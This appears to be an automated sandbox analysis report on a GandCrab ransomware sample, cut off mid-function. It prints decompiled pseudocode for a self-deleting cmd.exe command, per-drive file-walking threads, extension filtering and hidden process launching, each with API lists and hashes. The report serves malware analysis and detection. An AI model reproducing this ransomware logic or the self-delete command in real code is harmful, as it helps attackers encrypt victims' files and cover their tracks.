String ID: %s\CRAB-DECRYPT.txt
API String ID: 2985722263-2724392667
Opcode ID: cc192db359cb9dd70944d3d69816d07d5ebabcfa55c422f22e76d949faacc371
Instruction ID: 7ae504722043ae1c057cb788087df97492ddd43ac4ab208ff2b583b5bc5cedf3
Opcode Fuzzy Hash: cc192db359cb9dd70944d3d69816d07d5ebabcfa55c422f22e76d949faacc371
Instruction Fuzzy Hash: 7D01927A3C0310BBF2301F64AD4AF6A365CDFC5F26F110120FB05A61C1DBA979698A69

Uniqueness

Uniqueness Score: -1.00%

Function 0F145350 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F145350() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x0f145376
0x0f14537a
0x0f14537e
0x0f145388
0x0f145390
0x0f145399
0x0f1453b3
0x0f1453b3
0x0f145390
0x0f1453bb

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F1454E9,00000000,?,?,?,?,0F145615,00000000,popkadurak,00000000), ref: 0F145366
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F145378
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F145388
wsprintfW.USER32 ref: 0F145399
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F1453B3
ExitProcess.KERNEL32 ref: 0F1453BB

Strings

cmd.exe, xrefs: 0F1453A7
/c timeout -c 5 & del "%s" /f /q, xrefs: 0F145393
open, xrefs: 0F1453AC

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: 2c76671f935532948e176d6ba4c729f4741c96cbcd88eca92a32c9b15f583140
Instruction ID: a7e69dbd9184de0b9af2c5f41027965e0262eb069005331e34a83e8510f76201
Opcode Fuzzy Hash: 2c76671f935532948e176d6ba4c729f4741c96cbcd88eca92a32c9b15f583140
Instruction Fuzzy Hash: 70F0AC7A7C131077F1211A655C1FF472D199FC5F66F2A0015B708BE1C28AE474658AA9

Uniqueness

Uniqueness Score: -1.00%

Function 0F142C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F142C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xf14f290; // 0x21
				asm("movdqu xmm0, [0xf14f280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0F142AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

0x0f142c59
0x0f142c5e
0x0f142c66
0x0f142c69
0x0f142c70
0x0f142c76
0x0f142c79
0x0f142ce9
0x0f142cf2
0x0f142d01
0x0f142c7b
0x0f142c7e
0x0f142c9f
0x0f142cbd
0x0f142ccb
0x0f142cd7
0x0f142c80
0x0f142c94
0x0f142c94
0x0f142c7e

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0F142C8A
BeginPaint.USER32(?,?), ref: 0F142C9F
lstrlenW.KERNEL32(?), ref: 0F142CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0F142CBD
EndPaint.USER32(?,?), ref: 0F142CCB
CreateThread.KERNEL32 ref: 0F142CE9
DestroyWindow.USER32(?), ref: 0F142CF2

Strings

GandCrab!, xrefs: 0F142C5E

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID: GandCrab!
API String ID: 572880375-2223329875
Opcode ID: 43079e2340fed2cabc4546af9f1e0462d87168a0032bcc8f34bcb66d0fab9fa3
Instruction ID: afe15e97842dd0c79b6e5a2a3de603ef0a3a283f881b4202d3b8b42487ef729c
Opcode Fuzzy Hash: 43079e2340fed2cabc4546af9f1e0462d87168a0032bcc8f34bcb66d0fab9fa3
Instruction Fuzzy Hash: E511B636144209ABE711DF54DC09FAA7BACFF88722F000616FD41D6190E771B5B4CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0F143FF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F143FF0(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xf14f350; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0F146F40, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E0F145670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

0x0f143ff6
0x0f144008
0x0f14400c
0x0f144010
0x0f14401b
0x0f14401e
0x0f144020
0x0f144023
0x0f144028
0x0f14402c
0x0f144031
0x0f14403b
0x0f14403f
0x0f144046
0x0f144050
0x0f144054
0x0f14405a
0x0f144063
0x0f144072
0x0f144075
0x0f144082
0x0f144085
0x0f14408b
0x0f144092
0x0f14409f
0x0f1440a3
0x0f1440a4
0x0f1440a4
0x0f1440a7
0x0f1440a8
0x0f1440b6
0x0f1440ba
0x0f1440bd
0x0f1440c7
0x0f1440cf
0x0f1440d5
0x0f1440db
0x0f1440e1
0x0f1440eb
0x0f1440f2
0x0f1440f6
0x0f1440fa
0x0f1440fc
0x0f144104
0x0f14410d
0x0f14416c
0x0f144170
0x0f14410f
0x0f14410f
0x0f144112
0x0f144118
0x0f14411f
0x0f144120
0x0f144127
0x0f14412b
0x0f144130
0x0f144137
0x0f14413a
0x0f14413e
0x0f144148
0x0f14414a
0x0f14414e
0x0f144151
0x0f144154
0x0f144154
0x0f144154
0x0f14415a
0x0f14415e
0x0f144162
0x0f144166
0x0f144166
0x0f144176
0x0f14419a
0x0f144178
0x0f144178
0x0f144182
0x0f144186
0x0f14418d
0x0f1441a4
0x0f1441a8
0x0f1441c6

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0F144010
GetTickCount.KERNEL32 ref: 0F144035
GetDriveTypeW.KERNEL32(?), ref: 0F14405A
CreateThread.KERNEL32 ref: 0F144099
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0F1440DB
GetTickCount.KERNEL32 ref: 0F1440E1

Strings

?:\, xrefs: 0F144023

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: 66dde436c23a7114eccc564425c8a755b240f972974c5d2d2586c30158b8cb33
Instruction ID: 3446c68ec99b13028b9b7cc992a8e89d23d78ae756f0ff96c3dde7f11f1ed1bb
Opcode Fuzzy Hash: 66dde436c23a7114eccc564425c8a755b240f972974c5d2d2586c30158b8cb33
Instruction Fuzzy Hash: 1A5134745083009FD310CF18C884B5ABBE5FFC8724F514A2DF9899B391D375A958CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0F146F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F146F40(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0F146DF0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x0f146f59
0x0f146f5f
0x0f146f6e
0x0f146f7c
0x0f146f90
0x0f146f98
0x0f146fa0
0x0f146fa8
0x0f146fb6
0x0f146fcb
0x0f146fdb
0x0f146fe3

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0F146F59
wsprintfW.USER32 ref: 0F146F6E
InitializeCriticalSection.KERNEL32(?), ref: 0F146F7C
VirtualAlloc.KERNEL32 ref: 0F146FB0

Part of subcall function 0F146DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F146E23
Part of subcall function 0F146DF0: lstrcatW.KERNEL32(00000000,0F14FF44), ref: 0F146E3B
Part of subcall function 0F146DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F146E45

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0F146FDB
ExitThread.KERNEL32 ref: 0F146FE3

Strings

%c:\, xrefs: 0F146F68

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: 50d0d1192b859ee5ca6a6d4bda885b23bdf6f17a5f705432d50675ee6e1424be
Instruction ID: fabd5a2e80850e9dacfefdb88640fd78b7dac89711d757c1285766601b59627e
Opcode Fuzzy Hash: 50d0d1192b859ee5ca6a6d4bda885b23bdf6f17a5f705432d50675ee6e1424be
Instruction Fuzzy Hash: 290196B5184300BBE7109F54CC8AF177BA8AF84B25F004614FB659A2C1D7B8B558CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0F1469B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F1469B0(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xf152a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xf152a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}

0x0f1469b3
0x0f1469bc
0x0f1469be
0x0f1469d2
0x0f1469d7
0x0f1469dc
0x0f1469f0
0x0f1469fa
0x0f1469e0
0x0f1469e0
0x0f1469e6
0x0f1469e9
0x0f1469ea
0x00000000
0x00000000
0x00000000
0x0f1469ea
0x0f1469ee
0x0f146a17
0x0f146a1f
0x0f146a25
0x0f146a2b
0x0f146a30
0x0f146a36
0x0f146a82
0x0f146a89
0x0f146a8c
0x0f146a38
0x0f146a38
0x0f146a3e
0x0f146a42
0x0f146a44
0x0f146a44
0x0f146a49
0x0f146a69
0x0f146a6d
0x00000000
0x00000000
0x00000000
0x00000000
0x0f146a4b
0x0f146a50
0x0f146a50
0x0f146a56
0x00000000
0x00000000
0x0f146a5c
0x0f146a5e
0x00000000
0x0f146a60
0x0f146a60
0x0f146a67
0x00000000
0x00000000
0x00000000
0x00000000
0x0f146a67
0x00000000
0x0f146a5e
0x0f146a80
0x0f146a80
0x00000000
0x0f146a80
0x00000000
0x0f146a6f
0x0f146a6f
0x0f146a73
0x0f146a76
0x0f146a79
0x0f146a7e
0x0f146a3e
0x0f146a8f
0x0f146a97
0x0f146aa6
0x00000000
0x00000000
0x00000000
0x0f1469ee
0x0f1469c0
0x0f1469c9
0x0f1469c9

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0F146AEA), ref: 0F1469D2

Strings

%s , xrefs: 0F146A19

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %s
API String ID: 1659193697-4273690596
Opcode ID: ff2b89f328b85d06113097dd6c2853c636b74ffba22748c9da5e4d1220aab46a
Instruction ID: a05deca82618880eb2d0ca1f998f653d379864583792ec580b6603cb1bc63fa0
Opcode Fuzzy Hash: ff2b89f328b85d06113097dd6c2853c636b74ffba22748c9da5e4d1220aab46a
Instruction Fuzzy Hash: 54213772A006259BD7305F5C9C103B2B3A8EFC2729F558226EC46CB581E7B57DA082E0

Uniqueness

Uniqueness Score: -1.00%

Function 0F144E10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F144E10(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0F149170( &_v92, 0, 0x44);
				_t15 =  *0xf152a6c; // 0x0
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xf152a68; // 0x0
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x0f144e1c
0x0f144e22
0x0f144e24
0x0f144e29
0x0f144e2e
0x0f144e36
0x0f144e39
0x0f144e3c
0x0f144e41
0x0f144e48
0x0f144e4d
0x0f144e58
0x0f144e77
0x0f144e8d
0x0f144e98
0x0f144e79
0x0f144e83
0x0f144e83

APIs

_memset.LIBCMT ref: 0F144E29
CreateProcessW.KERNEL32 ref: 0F144E6F
GetLastError.KERNEL32(?,?,00000000), ref: 0F144E79
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F144E8D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F144E92

Strings

D, xrefs: 0F144E58

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: 1c2438ebb893abe58845b2b23f63081f93ccaf65d2d7bdda54c843a50feaa6f4
Instruction ID: b4fda5fffcbb1952d82aad94c4020f5932109d661ce13f2456f0ea1cc2ec085c
Opcode Fuzzy Hash: 1c2438ebb893abe58845b2b23f63081f93ccaf65d2d7bdda54c843a50feaa6f4
Instruction Fuzzy Hash: 9B012171E40358ABDB20DFE49C46BDE7BB8EF44B25F100156FA08B6180E7B525648B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F146E69 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0F146E69() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E0F146AB0(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0F146DF0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

0x0f146e70
0x0f146e84
0x0f146ea8
0x0f146eb1
0x0f146ee2
0x0f146eed
0x0f146eef
0x0f146ef2
0x0f146ef5
0x0f146ef7
0x0f146f00
0x0f146f00
0x0f146f03
0x0f146f03
0x0f146ef9
0x0f146efc
0x0f146efe
0x00000000
0x00000000
0x0f146efe
0x0f146ef7
0x0f146eb3
0x0f146ec7
0x0f146ecc
0x0f146f10
0x0f146f10
0x0f146f23
0x0f146f2e
0x0f146f3c

APIs

lstrcmpW.KERNEL32(?,0F14FF48,?,?), ref: 0F146E7C
lstrcmpW.KERNEL32(?,0F14FF4C,?,?), ref: 0F146E96
lstrcatW.KERNEL32(00000000,?), ref: 0F146EA8
lstrcatW.KERNEL32(00000000,0F14FF7C), ref: 0F146EB9

Part of subcall function 0F146DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F146E23
Part of subcall function 0F146DF0: lstrcatW.KERNEL32(00000000,0F14FF44), ref: 0F146E3B
Part of subcall function 0F146DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F146E45

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F146F1D
FindClose.KERNEL32(00003000,?,?), ref: 0F146F2E

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: 4586828c4c57a20b7441318fc50da76e27d706d193917f6835940da375110827
Instruction ID: 152618b87493ed90758691ef5aac96d89d7afea13886feaf6358c82e720599c0
Opcode Fuzzy Hash: 4586828c4c57a20b7441318fc50da76e27d706d193917f6835940da375110827
Instruction Fuzzy Hash: 33019232A0020DABCF259F60DC48BEEBBB8FF86315F0040A5F945D2151DB36BAA5DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0F1433E0 Relevance: 7.6, APIs: 5, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F1433E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0F1432B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0F143320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0F143190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0F143200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
